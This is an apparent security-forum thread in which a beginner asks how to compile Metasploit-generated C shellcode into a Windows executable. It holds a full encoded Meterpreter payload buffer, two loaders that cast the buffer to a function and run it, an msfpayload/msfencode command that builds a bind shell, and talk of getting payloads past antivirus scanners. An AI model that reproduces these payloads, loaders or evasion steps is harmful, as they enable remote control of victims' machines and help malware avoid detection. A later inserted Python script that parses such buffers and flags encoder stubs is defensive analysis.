Hello,
I'm a noob at compiling a Metasploit-generated payload in C format and building it with any Windows C/C++ compiler. I tried it in MinGW, Borland and Visual C, using this method...
1. I generate the Metasploit payload with a format of C. The result is below:
The generated code:
unsigned char buf[] =
"\xdb\xc5\xd9\x74\x24\xf4\x29\xc9\x5f\xbd\x14\x21\x6c\xf7\xb1"
"\x45\x83\xc7\x04\x31\x6f\x16\x03\x6f\x16\xe2\xe1\xdd\x84\x7e"
"\x09\x1e\x55\xe1\x80\xfb\x64\x33\xf6\x88\xd5\x83\x7d\xdc\xd5"
"\x68\xd3\xf5\x6e\x1c\xfb\xfa\xc7\xab\xdd\x35\xd7\x1d\xe1\x9a"
"\x1b\x3f\x9d\xe0\x4f\x9f\x9c\x2a\x82\xde\xd9\x57\x6d\xb2\xb2"
"\x1c\xdc\x23\xb7\x61\xdd\x42\x17\xee\x5d\x3d\x12\x31\x29\xf7"
"\x1d\x62\x82\x8c\x55\x9a\xa8\xcb\x45\x9b\x7d\x08\xb9\xd2\x0a"
"\xfb\x4a\xe5\xda\x35\xb3\xd7\x22\x99\x8a\xd7\xae\xe3\xcb\xd0"
"\x50\x96\x27\x23\xec\xa1\xfc\x59\x2a\x27\xe0\xfa\xb9\x9f\xc0"
"\xfb\x6e\x79\x83\xf0\xdb\x0d\xcb\x14\xdd\xc2\x60\x20\x56\xe5"
"\xa6\xa0\x2c\xc2\x62\xe8\xf7\x6b\x33\x54\x59\x93\x23\x30\x06"
"\x31\x28\xd3\x53\x43\x73\xbc\x90\x7e\x8b\x3c\xbf\x09\xf8\x0e"
"\x60\xa2\x96\x22\xe9\x6c\x61\x44\xc0\xc9\xfd\xbb\xeb\x29\xd4"
"\x7f\xbf\x79\x4e\xa9\xc0\x11\x8e\x56\x15\xb5\xde\xf8\xc6\x76"
"\x8e\xb8\xb6\x1e\xc4\x36\xe8\x3f\xe7\x9c\x9f\x07\x7f\xdf\x08"
"\x86\xf5\xb7\x4a\x89\x1c\xfb\xc2\x6f\x74\xeb\x82\x38\xe0\x92"
"\x8e\xb3\x91\x5b\x05\x51\x51\xce\xa2\xf0\x06\x66\xa9\x25\x60"
"\x29\x52\x00\xfb\xe0\xc6\xeb\x93\x0c\x07\xec\x63\x5b\x4d\xec"
"\x0b\x3b\x35\xbf\x2e\x44\xe0\xc9\x73\xe8\x61\xca\x25\x5c\x21"
"\xa2\xcb\xbb\x05\x6d\x34\xee\x97\x51\xe3\xd7\x1d\xa3\x86\x3b"
"\xde\x46";
and copy it and then paste it into <framework32>/data/templates/template.c
but I don't know where to insert it, so I tried this method:
#include <stdio.h>

/* encoded payload bytes as printed by msfencode (format c) */
unsigned char payload[] =
"\xdb\xc5\xd9\x74\x24\xf4\x29\xc9\x5f\xbd\x14\x21\x6c\xf7\xb1"
"\x45\x83\xc7\x04\x31\x6f\x16\x03\x6f\x16\xe2\xe1\xdd\x84\x7e"
"\x09\x1e\x55\xe1\x80\xfb\x64\x33\xf6\x88\xd5\x83\x7d\xdc\xd5"
"\x68\xd3\xf5\x6e\x1c\xfb\xfa\xc7\xab\xdd\x35\xd7\x1d\xe1\x9a"
"\x1b\x3f\x9d\xe0\x4f\x9f\x9c\x2a\x82\xde\xd9\x57\x6d\xb2\xb2"
"\x1c\xdc\x23\xb7\x61\xdd\x42\x17\xee\x5d\x3d\x12\x31\x29\xf7"
"\x1d\x62\x82\x8c\x55\x9a\xa8\xcb\x45\x9b\x7d\x08\xb9\xd2\x0a"
"\xfb\x4a\xe5\xda\x35\xb3\xd7\x22\x99\x8a\xd7\xae\xe3\xcb\xd0"
"\x50\x96\x27\x23\xec\xa1\xfc\x59\x2a\x27\xe0\xfa\xb9\x9f\xc0"
"\xfb\x6e\x79\x83\xf0\xdb\x0d\xcb\x14\xdd\xc2\x60\x20\x56\xe5"
"\xa6\xa0\x2c\xc2\x62\xe8\xf7\x6b\x33\x54\x59\x93\x23\x30\x06"
"\x31\x28\xd3\x53\x43\x73\xbc\x90\x7e\x8b\x3c\xbf\x09\xf8\x0e"
"\x60\xa2\x96\x22\xe9\x6c\x61\x44\xc0\xc9\xfd\xbb\xeb\x29\xd4"
"\x7f\xbf\x79\x4e\xa9\xc0\x11\x8e\x56\x15\xb5\xde\xf8\xc6\x76"
"\x8e\xb8\xb6\x1e\xc4\x36\xe8\x3f\xe7\x9c\x9f\x07\x7f\xdf\x08"
"\x86\xf5\xb7\x4a\x89\x1c\xfb\xc2\x6f\x74\xeb\x82\x38\xe0\x92"
"\x8e\xb3\x91\x5b\x05\x51\x51\xce\xa2\xf0\x06\x66\xa9\x25\x60"
"\x29\x52\x00\xfb\xe0\xc6\xeb\x93\x0c\x07\xec\x63\x5b\x4d\xec"
"\x0b\x3b\x35\xbf\x2e\x44\xe0\xc9\x73\xe8\x61\xca\x25\x5c\x21"
"\xa2\xcb\xbb\x05\x6d\x34\xee\x97\x51\xe3\xd7\x1d\xa3\x86\x3b"
"\xde\x46";

int main(int argc, char **argv)
{
    /* cast the byte buffer to a function pointer and call it */
    (*(void (*)()) payload)();
    return 0;
}
It successfully compiled, but the problem is there is a warning: no newline at end of file. And I tried to run it... it connects but it stops at "Uploading DLL". Can someone help me with this? I'm totally a noob... and trying to learn. I'm trying to create/modify the code and compile my own. Thank you very much.... I changed "unsigned char buf[]" to "unsigned char payload[]".
Try not using the meterpreter payload and see how that goes for you.
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
What are you trying to do? Are you wanting to create a payload from msfpayload in C and add it to a public exploit, or your exploit?
ex: You found an exploit on milw0rm but want to change the payload.
Some good info on this thread: http://forums.remote-exploit.org/pen...shellcode.html
Sort of, I think... I generate an msf payload through msfencode and the output is in C, not EXE, so that I can compile it on my own. I got this idea from below:
So, I've seen a few articles at pauldotcom (except ours will work encoded) and SANS covering sending a Metasploit payload through scanners and some of the mileage people are seeing. Most have gotten down to around 6 of 36 listed on virustotal.com. I thought I'd give it a go and see for myself. Here's how I got detected by 1 of 36 in one turn.
Now we use msfpayload piped to msfencode with the ever so popular x86/shikata_ga_nai encoder: Code:
./msfpayload windows/shell_bind_tcp LPORT=30000 R | ./msfencode -e x86/shikata_ga_nai c > ~/binder.c
Now we have our bind shell encoded and waiting in binder.c. From here, you can simply cut and paste this code straight into <framework32>/data/templates/template.c
Finally, we compile that into a windows executable using Mingw32. Uploading this to virustotal.com showed that AVG was the only scanner to detect our payload.
For the cross compiling check out the last video.
Up and Running Backtrack 4 - Offensive Security
What you are seeing in the output of the Metasploit command is a C-style buffer full of assembly opcodes - it's shellcode. You won't be able to change what the payload actually does unless you disassemble the shellcode and modify it in assembler.
That warning you were getting about "no newline at end of file" isn't serious - it's a "warning", which does not stop compilation, as opposed to an "error", which does. You fix it by putting a newline at the end of your C source file.
Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".
The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.
No big deal, what you are missing is that shellcode is a self-sustained chunk of opcodes that, although it runs fine when it gets executed bit by bit, isn't meant to be run as a full program. You have two options if you want to pursue this, the hard way and the easy way.
The hard way involves editing the shellcode into a full fledged ASM program.
The easy way involves letting the compiler do the work by using the exece() call or by putting the shellcode (once it's back in ASM form) in an _asm brace.
You can also try using the following C code to turn your shellcode into an executable (taken from the Metasploit Windows shellcode site). However (and this is the point I was trying to make before) you're not really gaining anything by creating the code in C format from Metasploit and then compiling it into a Windows executable UNLESS you go about changing the shellcode in assembler before you compile. And if you want to learn assembler there are better approaches to learning it than this.
Alternatively, if you want to learn how to write this type of code in C, start off with a program that's actually written in C.
Code:
/* paste the "\xNN" bytes from msfencode in place of <code_here> */
char shellcode[] = "<code_here>";

int main(int argc, char **argv)
{
    int (*funct)();
    /* treat the buffer as a function and call it */
    funct = (int (*)()) shellcode;
    (int)(*funct)();
    return 0;
}
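Both replies above make the same point: the msfencode output is a C string literal of opcodes, and the loader does nothing more than cast that buffer to a function pointer. From the defender's side the useful skill is the reverse one: recovering the raw bytes from such a source file and recognising the decoder stub an encoder leaves at the front of it. The following script is an added example, not code from any poster in this thread or from Metasploit. It parses a C-format buffer (tolerating the stray "\ x" spaces the forum software inserted) and flags known GetPC sequences; the fnstenv form is the one x86/shikata_ga_nai emits after a random FPU instruction, and it is the same \xd9\x74\x24\xf4 sequence visible at offset 2 of the buffer posted above. The embedded sample is constructed: it contains only the first 25 bytes from the thread, and the signature table and function names are my own.

```python
import re
import sys

# Constructed sample input: the first 25 bytes of the C-format buffer posted in
# this thread (the rest is deliberately omitted), in the declaration shape that
# msfencode's "c" output format produces. The " \ x6c" keeps the forum's garbling
# so the parser's tolerance for it is exercised.
SAMPLE_C_BUFFER = r'''
unsigned char buf[] =
"\xdb\xc5\xd9\x74\x24\xf4\x29\xc9\x5f\xbd\x14\x21\ x6c\xf7\xb1"
"\x45\x83\xc7\x04\x31\x6f\x16\x03\x6f\x16";
'''

# Byte sequences that position-independent decoder stubs use to learn their own
# address ("GetPC"). This table is my own; the fnstenv [esp-0xc] form is what
# x86/shikata_ga_nai emits right after its leading FPU instruction.
GETPC_STUBS = {
    bytes.fromhex("d97424f4"): "fnstenv [esp-0xc] (FPU GetPC, x86/shikata_ga_nai)",
    bytes.fromhex("e800000000"): "call $+5 (call/pop GetPC)",
}

# One "\xNN" escape, allowing whitespace between the backslash, the x and the digits.
_ESCAPE = re.compile(r'\\\s*x\s*([0-9a-fA-F]{2})')


def parse_c_shellcode(text: str) -> bytes:
    """Recover the raw bytes from a C "\\xNN" string literal as msfencode prints it."""
    # Only the initialiser after '=' is scanned, so nothing in the declaration
    # or a preceding comment is mistaken for payload bytes.
    body = text.split("=", 1)[-1]
    return bytes(int(h, 16) for h in _ESCAPE.findall(body))


def find_getpc_stubs(code: bytes) -> list:
    """Return (offset, description) for every known GetPC stub in the buffer."""
    hits = []
    for sig, desc in GETPC_STUBS.items():
        start = 0
        while (pos := code.find(sig, start)) != -1:
            hits.append((pos, desc))
            start = pos + 1
    return sorted(hits)


def triage(text: str) -> dict:
    """Summarise one C-format buffer: size, leading bytes and any stub hits."""
    code = parse_c_shellcode(text)
    hits = find_getpc_stubs(code)
    return {
        "length": len(code),
        "head": code[:8].hex(),
        "getpc_hits": hits,
        # A GetPC stub within the first few bytes is the classic encoder layout.
        "likely_encoded_shellcode": bool(hits) and hits[0][0] < 16,
    }


if __name__ == "__main__":
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_C_BUFFER
    report = triage(source)
    print(f"{report['length']} bytes, starts {report['head']}")
    for off, desc in report["getpc_hits"]:
        print(f"  offset {off:#06x}: {desc}")
    print("verdict:", "encoded shellcode stub found"
          if report["likely_encoded_shellcode"] else "no GetPC stub seen")
```

Run it with a path to a .c file to triage that file, or with no argument to use the embedded sample. The triage function returns a dict so the check can sit in a repository or build-pipeline scan rather than only printing. A hit is a heuristic, not a verdict: the same GetPC sequences appear in legitimate position-independent code, and a fixed byte signature is exactly what encoders are built to mutate past, which is why the thread's AV results vary so much.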
Thanks for the reply and advice.... now I've started to research all the advice given here... this is really not easy for me... especially assembly... God bless me....